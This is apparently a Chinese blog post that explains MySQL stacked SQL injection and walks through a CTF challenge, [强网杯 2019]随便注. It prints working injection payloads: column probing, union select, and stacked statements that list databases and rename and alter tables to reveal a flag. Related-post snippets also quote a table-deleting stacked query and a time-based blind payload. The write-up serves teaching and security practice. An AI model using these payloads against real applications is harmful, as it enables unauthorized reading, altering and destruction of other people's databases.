堆叠注入原理解析

最新推荐文章于 2023-12-28 16:03:25 发布
最新推荐文章于 2023-12-28 16:03:25 发布
阅读量7.8k 收藏 23
点赞数 8
分类专栏: Web安全-Sql注入 文章标签: web安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/123594626
版权

文章目录

一、堆叠注入原理

mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,是否会一起执行?
因此这个想法也就造就了堆叠注入

二、堆叠注入触发条件

堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条sql语句,这就需要服务器在访问数据端时使用的是可同时执行多条sql语句的方法,例如php中的mysqli_multi_query函数。但与之相对应的mysqli_query()函数一次只能执行一条sql语句,所以要想目标存在堆叠注入,在目标主机没有对堆叠注入进行黑名单过滤的情况下必须存在类似于mysqli_multi_query()这样的函数,简单总结下来就是

1、目标存在sql注入漏洞
2、目标未对";"号进行过滤
3、目标中间层查询数据库信息时可同时执行多条sql语句

堆叠注入的局限性

堆叠注入并不是在每种情况下都能使用的。大多数时候,因为API或数据库引擎的不支持,堆叠注入都无法实现。

三、题目

[强网杯 2019]随便注
首先判断闭合符号:
输入1,页面返回:在这里插入图片描述
输入1’ 页面报错了,加上注释符号#页面又回显正常,那么闭合符号就是单引号;

判断列数:

1' order by 2#   //回显正常
1' order by 3#   //会先报错

联合查询:

1' union select 1,2#

发现过滤了很多函数。
在这里插入图片描述

尝试堆叠注入:

1'; show databases;#

在这里插入图片描述
查表名:
在这里插入图片描述
查询这两个表名中的列:

-1'; show columns from 'words';#

在这里插入图片描述
这里查询表名使用反单引号
注意:在windows系统下,反单引号(`)是数据库、表、索引、列和别名用的引用符:

-1'; show columns from `1919810931114514`;#

发现了flag这个列
在这里插入图片描述
但是到这里就会出现问题,虽然我们已经得到了flag了,但是select被过滤了,而show命令又不能查看值。这就比较头疼了,不过如果仔细观察的话,一开始过滤的并没有alert 和 rename,我们已经知道了words是用来回显内容的,能不能我们把1919810931114514这个表更改名字为words,并增加相应的字段,使之回显原1919810931114514这个表的内容那,当然是可以的。

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) ;show columns from words;#

用1’ or ‘1’='1访问一下,便可以发现flag
在这里插入图片描述

Stray.io
关注
  • 8
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据库手动注入到提权(Oracle、PostgreSQL、联合查询、布尔注入、报错注入、延时注入、堆查询注入、带外注入、写WebShell)
墨痕诉清风的博客
07-24 631
Oracle类型判断PostgreSQL类型判断(特有的语法)
堆叠 注入
qq_63527808的博客
04-12 100
堆叠注入是当 php 连接 mysql 进行查询时,若查询语句使用的是 mysqli_multi_query() 而不是 mysqli_query()时,就会存在堆叠注入;区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句;而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?作分隔,然后同时执行多个语句;
SQL注入——堆叠注入
Zhujiangcheng的博客
06-08 923
SQL注入简介——堆叠注入(一)SQL注入的概述和分类1.概述2.分类①按照数据提交的方式来分类:②按照执行效果来分类:③按照注入点类型来分类:(二)堆叠注入1.概念2.局限 (一)SQL注入的概述和分类 1.概述   首先说,什么是SQL注入?   程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤、转义、限制,或者处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据,这一构造字符串非法获取数据的过程就被称为SQL注入。 2.分类 (参考来源: link.) ①按照数
MYSQL注入天书之stacked injection(堆叠注入
烟敛寒林的博客
10-24 1475
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
sql注入堆叠注入
weixin_42566218的博客
02-19 9027
一、堆叠注入原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行界面执行一条查询语句,这时语句的结尾必须加上分号结束 select * from student; 如果我们想要执行多条sql那就用结束符分号进行隔开,比如在查询的同时查看当前登录用户是谁 select * from student;select current_user();
SQL注入原理-堆叠注入
zl5186888的博客
09-21 623
mysqli_query()只能执行一条SQL语句,如果这需要执行多条SQL语句,就需要使用mysqli_multi_query()方法,mysqli_multi_query()可以执行多条SQL语句,如果后端代码使用这个方法去执行SQL语句,我们就可以利用堆叠注入获取后台数据库的信息。这样我们就得到了当前数据库长度,接下来可以爆出数据库的库名以及接下来的获取数据的各种操作,具体的时间盲注操作可以参考我之前的文章——SQL注入原理之时间盲注,原理都一样,小伙伴理解之后套用就行了。
SQL注入堆叠注入技术解析
# 1. SQL注入概述 SQL注入Web应用程序中最常见的安全漏洞之一。攻击者通过在应用程序的用户界面输入恶意代码,利用应用程序对用户...## 1.2 SQL注入的危害和原理 SQL注入的危害包括但不限于数据库信息泄露、敏感数
sql注入过滤select_SQL注入高级进阶-堆叠注入
weixin_39808803的博客
11-21 1347
原理0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。0x01 堆叠注入原理 在SQL中,分号(;)是用来表示一条s...
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1259
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
sql注入攻击防范解析
12-13
4. **堆叠查询注入**:在单个查询中注入多个SQL语句。 三、防范SQL注入策略 1. **参数化查询**:使用预编译的SQL语句,如PDO和参数化存储过程,使用户输入的数据不会与SQL命令混淆。 2. **输入验证**:对用户输入...
MYSQL注入天书之stacked injection
weixin_34221332的博客
08-11 642
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
SQL注入-堆叠注入
m0_53820621的博客
08-15 1422
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
sql-堆叠注入
zhhhb1005的博客
08-14 523
前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。
mysql堆叠注入条件_白帽子:SQL注入堆叠注入
weixin_31358991的博客
02-10 307
原标题:白帽子:SQL注入堆叠注入在SQL语句中,语句的结束都是以`;`结尾,但是如果我们在`;`后面再加上一条SQL语句,两条语句会一起执行吗?这也就是造成堆叠注入的原因了最简单的语句`select * from users;DELETE FROM test`先查询user表,然后再从test数据库里删除user表。下面我们进行实战靶场:sql-libs38先判断闭合点,为' 再构造paylo...
堆叠注入
糖小喵
04-22 381
原理 执行多条语句,多语句之间以分号隔开。首先访问id=1'页面显示错误,id=1'%23,页面返回正常结果。可使用布尔注入、时间注入、也可堆叠注入。 ';select if(substr(user(),1,1)='r',sleep(3),1)%23 堆叠注入的局限性在于并不是每一个环境下都可以执行, 可能受到 API 或者数据库引擎不支持的限制, 当然了权限不足也可以解释为什么攻击者无法...
堆叠注入(stacked injecti)
最新发布
m0_73248913的博客
12-28 524
表示一条sql语句的结束,在后面再次执行下一条sql语句。(union只能苹姐一条select语句)其实可以发现就是简单的都能用,和做sql是一样的操作。概念:执行多条sql语句一起执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值